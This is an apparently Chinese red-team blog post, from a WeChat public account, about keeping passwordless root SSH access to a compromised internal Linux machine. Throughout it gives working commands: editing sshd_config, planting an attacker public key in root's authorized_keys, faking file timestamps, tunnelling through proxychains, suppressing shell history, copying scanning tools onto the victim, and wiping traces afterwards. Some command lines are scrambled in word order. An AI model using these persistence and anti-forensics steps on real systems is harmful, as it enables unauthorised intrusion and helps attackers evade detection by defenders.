场景说明
比如,前期通过一些 Rce,提权 或者其它方式,拿到内网一台linux 目标机的root权限,但用户密码hash跑不出来,机器无法正常出网,Webshell 里操作实在是麻烦, 费劲,为了能更方便的进行后续的内网渗透操作,现在就迫切需要一个真正的pts终端,怎么搞 ? 很简单,如下
0x01 首先,修改目标 Ssh 服务配置
启用Ssh证书登录,并重启SSH 服务 [ 此处linux发行版为 CentOS7.x 其它发行版同理 ]
echo RSAAuthentication yes >> /etc/ssh/sshd_config
echo PubkeyAuthentication yes >> /etc/ssh/sshd_config
systemctl restart sshd
0x02 然后,回到本地linux上生成密钥对
"" -f ~/.ssh/id_rsa ssh-keygen -t rsa -P
ls -al /root/.ssh/
cp /root/.ssh/id_rsa.pub /home/sot/Desktop/
mv /home/sot/Desktop/id_rsa.pub /home/sot/Desktop/authorized_keys
0x03 接着,回到内网linux目标机上
将生成的公钥完整追加到目标linux root用户.ssh目录下的authorized_keys文件中,实际中,这个文件下可能还有很多条公钥,所以,直接追加即可,另外,稍微补充点额外内容,在这个文件的末尾,存的还有对应的用户和机器名,比如,当你看到类似 administrator@DESKTOP-ADMIN 这样的内容,则说明 DESKTOP-ADMIN这台机器很可能管理员的个人机,日常都是直接通过这台机器来管理该机器的,后期的横向重点不言而喻,另外,如果想做的更精致一点,可以把authorized_keys时间戳也改下,注意,再操作之前,务必要对原authorized_keys进行 "全属性备份",用完之后好替换回去
echo ssh-rsa AA**+ldFbB root@Riter >> /root/.ssh/authorized_keys
0x04 最后
利用HTTP正向代理,直接在本地无密码直连内网linux 目标机,此时的shell便是一个正儿八经的 pts 终端了,vi编辑,tab键自动补全,CTRL+C ...只要网络稳定,都是没有任何问题的,只是记得在任务结束把相应的ssh连接记录 和 对应的公钥都顺手处理掉 [ 可能会泄露你的用户和机器名 ]
"StrictHostKeyChecking no" [email protected] proxychains4 ssh -t -o
export HISTCONTROL=ignorespace
echo $HISTCONTROL
w
0x05 同理,利用Scp 无密码互传文件
# proxychains4 scp -P 22 -r /root/Srvscan [email protected]:/usr/tmp/Srvscan
# proxychains4 scp -P 22 -r /root/fingerprint.py [email protected]:/usr/tmp/
# proxychains4 scp -P 22 -r /root/GetWebBanner.py [email protected]:/usr/tmp/
如果觉得确实还不错,欢迎积极转发留言,以便让更多真正需要的人也能看到,如文中遇到错误,欢迎随时私信指正,非常感谢
另外,也非常期待能和更多真正志同道合弟兄一起深入交流学习,( 还是那句话,维护不易,乱七八糟的人就不要来了,非常感谢 ),密圈已适时优惠,需要的弟兄,请尽快,定期进来偷资料的,请自行离开,谢谢
本文始发于微信公众号(红队防线):无密码正向直连内网linux目标机
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论